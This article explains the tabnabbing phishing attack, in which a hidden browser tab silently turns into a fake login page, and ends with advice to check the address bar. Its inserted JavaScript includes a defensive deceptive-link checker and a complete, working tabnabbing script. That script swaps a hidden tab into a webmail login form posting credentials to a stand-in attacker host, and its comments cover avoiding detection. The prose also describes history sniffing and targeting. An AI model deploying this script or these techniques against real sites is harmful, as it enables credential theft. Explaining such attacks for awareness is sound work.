A cunning new phishing technique - Tabnabbing

Introduction

Over the years, a steady stream of ingenious new words for security problems has appeared: pharming, vishing, clickjacking and slurping, to name a few. This week a new one was born, tabnabbing, and it turns out to be scarier than most.

Safer browsing: Do not click on links in emails

One of the more common pieces of advice on safe browsing is to avoid clicking links in e-mails. Instead, type the address into your browser or, more conveniently, copy the URL text and paste it into the address bar. The reason is of course that the address a link actually points to may be completely different from the URL text it displays.
Consider the example in the original posting: a link whose text reads www.google.com does not take you to Google's home page but to Norman's home page. You can see the real target address by hovering the mouse pointer over the link, or by inspecting the link's href attribute.
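As an added example (not code from the original article), the check a mail filter or browser extension would apply to the www.google.com case above: flag any link whose visible text names one host while its href leads to another. The function names (looksLikeAddress, hostOf, isDeceptiveLink, findDeceptiveLinks) and the sample anchors are made up for illustration, and the Norman address used as the link target is an assumption.

```javascript
// Added example: detect links whose visible text names one host while the
// href leads to another. Names and sample data are constructed; the Norman
// address is an assumed illustration of the article's example.

// Does the link text look like an address the reader would take as the destination?
function looksLikeAddress(text) {
  const t = text.trim().replace(/^[a-z][a-z0-9+.-]*:\/\//i, '');
  return /^[a-z0-9-]+(\.[a-z0-9-]+)+(:\d+)?(\/\S*)?$/i.test(t);
}

// Host of a URL or bare hostname, or null if it does not parse.
// A leading "www." is dropped so www.google.com and google.com compare equal.
function hostOf(value) {
  const v = value.trim();
  const withScheme = /^[a-z][a-z0-9+.-]*:\/\//i.test(v) ? v : 'http://' + v;
  try {
    return new URL(withScheme).hostname.toLowerCase().replace(/^www\./, '');
  } catch (e) {
    return null;
  }
}

// True when the text names a host and the href goes somewhere else.
// Exact host comparison matters: bank.example.attacker.test contains the
// string "bank.example" but is a different host (the subdomain trick).
function isDeceptiveLink(text, href) {
  if (!looksLikeAddress(text)) return false;   // "click here" etc.: nothing to compare
  const shown = hostOf(text);
  const actual = hostOf(href);
  return shown !== null && actual !== null && shown !== actual;
}

function findDeceptiveLinks(anchors) {
  return anchors.filter(function (a) { return isDeceptiveLink(a.text, a.href); });
}

// Constructed sample. In a page you would build this list with
// Array.from(document.links).map(a => ({ text: a.textContent, href: a.href })).
const SAMPLE_ANCHORS = [
  { text: 'www.google.com', href: 'http://www.norman.com/' },   // the article's example (Norman address assumed)
  { text: 'www.google.com', href: 'https://www.google.com/' },  // honest link
  { text: 'Google', href: 'http://www.norman.com/' },          // text is a name, not an address
  { text: 'https://bank.example/login', href: 'http://bank.example.attacker.test/login' }, // subdomain trick
];

// findDeceptiveLinks(SAMPLE_ANCHORS) returns the first and the last entry.
```

The check deliberately ignores links whose text is an ordinary word ("Google", "click here"): those cannot be verified from the text alone, and flagging them all would bury the real mismatches.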

A recent blog posting introduced a new type of attack that is loosely related.

The tabnabbing phishing attack

The term tabnabbing was introduced in a blog posting by Aza Raskin, creative lead of Firefox, one of the most widely used browsers.

In short, the attack works like this:

  1. A user opens a web page on which a tabnabbing attack has been implemented.
    To lure the user onto such a page, any of the usual social engineering techniques may be used, or the attacker may have gained control of a legitimate web site by means of some exploit.
  2. Whenever the page loses focus (the user switches to another browser tab or to another application), a tabnabbing JavaScript on the page performs the following actions:
    • It replaces the page's icon (the favicon.ico image) with an icon of the attacker's choice.
    • It changes the browser tab's title to a title of the attacker's choice.
    • It replaces the page's content with content of the attacker's choice.
  3. When the user returns to the original tab (now altered), he may easily be tricked into performing actions that reveal critical personal information, for example his login credentials for a protected web resource.

In the proof of concept in Raskin's blog, this was demonstrated by turning his blog posting into Google Gmail's login page (see the image at the end of this article).
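As an added example that is not part of the original posting and is not Raskin's proof of concept, here is the page swap from steps 2 and 3 written as a small JavaScript function over a document-like object, so it can be run and tested under Node as well as dropped into a page. All names (installTabnab, makeFakeDocument, PHISH_PAYLOAD), the attacker.invalid addresses and the login-form markup are made up for illustration.

```javascript
// Added example: the tabnabbing page swap as a function over a document-like
// object. Not Raskin's PoC; names, addresses and markup are constructed.

// What the attacker substitutes once the tab is out of sight. Title, icon
// address and form are constructed to resemble a webmail login; a real attack
// would copy the target site's markup.
const PHISH_PAYLOAD = {
  title: 'Webmail: Sign in',
  favicon: 'https://attacker.invalid/mail.ico',
  body:
    '<form action="https://attacker.invalid/harvest" method="post">' +
    '<input name="user"><input name="pass" type="password">' +
    '<input type="submit" value="Sign in"></form>',
};

// The favicon is the <link rel="icon"> (or rel="shortcut icon") in <head>;
// rewriting its href is enough to change the icon shown on the tab.
function faviconLink(doc) {
  return doc.querySelector('link[rel~="icon"]');
}

// Arms the page. The swap fires when the document reports itself hidden
// (tab switched, window minimised); early proofs of concept used window
// blur/focus for the same purpose. Returns a handle exposing the original
// state, a swapped flag and restore(), which the attacker calls after the
// harvest so the victim lands back on the page he left.
function installTabnab(doc, payload, opts) {
  const delayMs = (opts && opts.delayMs !== undefined) ? opts.delayMs : 5000;
  const link = faviconLink(doc);
  const original = {
    title: doc.title,
    favicon: link ? link.href : null,
    body: doc.body.innerHTML,
  };
  const handle = { swapped: false, original: original, restore: restore };
  let timer = null;

  function swap() {
    doc.title = payload.title;
    if (link) link.href = payload.favicon;
    doc.body.innerHTML = payload.body;
    handle.swapped = true;
  }
  function restore() {
    doc.title = original.title;
    if (link && original.favicon) link.href = original.favicon;
    doc.body.innerHTML = original.body;
    handle.swapped = false;
  }
  function onVisibilityChange() {
    if (doc.visibilityState === 'hidden') {
      // Wait a little: the user should have forgotten what the tab looked like.
      if (delayMs > 0) timer = setTimeout(swap, delayMs);
      else swap();
    } else if (timer !== null) {
      clearTimeout(timer);   // came back too soon; do not give the game away
      timer = null;
    }
  }

  doc.addEventListener('visibilitychange', onVisibilityChange);
  return handle;
}

// Constructed stand-in for the browser document so the block runs under Node;
// only the members installTabnab touches are modelled.
function makeFakeDocument(title, faviconHref, bodyHtml) {
  const listeners = {};
  const icon = { href: faviconHref };
  return {
    title: title,
    visibilityState: 'visible',
    body: { innerHTML: bodyHtml },
    querySelector: function (selector) {
      return /icon/.test(selector) ? icon : null;
    },
    addEventListener: function (type, fn) {
      (listeners[type] = listeners[type] || []).push(fn);
    },
    // Test hook: fire an event as the browser would.
    dispatch: function (type) {
      (listeners[type] || []).forEach(function (fn) { fn(); });
    },
  };
}

// In a real page this single call is the whole attack.
if (typeof document !== 'undefined') {
  installTabnab(document, PHISH_PAYLOAD, { delayMs: 5000 });
}
```

The restore() call is what makes the refinement discussed under "Checking login information" below plausible: once the credentials have been posted to the attacker, the original page is put back and the user sees nothing but a spurious logout. Note also what the script does not touch: the address bar. The origin shown there is the one thing a page cannot forge, which is why the advice at the end of the article is to read it before typing a password.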

Note that this type of attack is not limited to the Firefox browser; other browsers are vulnerable to varying degrees. One researcher even showed that a variant of the attack can be performed without using JavaScript at all; see the 25 May update at the end of the blog posting on this subject from Krebs on Security.

What is new about this attack is that it does not depend on presenting a bogus web page in the first place. Instead it changes the web page, and the corresponding browser tab, while the user is occupied elsewhere. Our mental defenses are not set up to guard against this type of attack: we trust that a tab still shows what it showed when we left it.

Targeting the attacks

An attack of this type becomes much more effective if it is refined and targeted. A clever cyber criminal can fine-tune the attack to fit a group with particular characteristics.

Checking login information

There are ways for a web page to find out whether its visitor is logged in to certain other web sites (at the time, for example, by sniffing browsing history through CSS :visited styling, or by probing whether a cross-site resource that requires a session loads successfully).

By displaying a fake login page using the technique described above, the attacker tricks the user into re-entering his credentials. The attacker harvests them for later use and then sends the user back to the original, already logged-in page (the user was logged in from the start). The unsuspecting user will have noticed nothing beyond an unexpected logged-out situation, which, as we all know, happens occasionally anyway.

The attacker can then calmly use the obtained credentials for whatever evil deed she has in mind.

Targeting specific users

Obviously it will not work to display a login page for an application the user has never used. Even the most trusting user will wonder when he suddenly sees a login page for an Internet bank he has no account with.

The attack may therefore be refined further by targeting a particular group of users the attacker knows to use a particular application: for example the login page of an organization's intranet, or a set of users who all use the same Internet bank.

Such a targeted attack requires some investigation and preparation before the attack itself. The potential for success, however, is probably quite good.

Expectations

Attacks of the types described here are frighteningly easy to perform in their simplest form, so real attacks can be expected to emerge soon.

For now, the best advice for users who want to avoid falling victim to such an attack is to check the URL in the address bar (usually at the top of the browser) before entering any credentials, and not to rely on the icon and text shown on the tab. A page can rewrite its own title, icon and content, but it cannot change the site name shown in the address bar. See image below:


It will be interesting to see how the developers of the various browsers respond to this threat in future versions and updates.
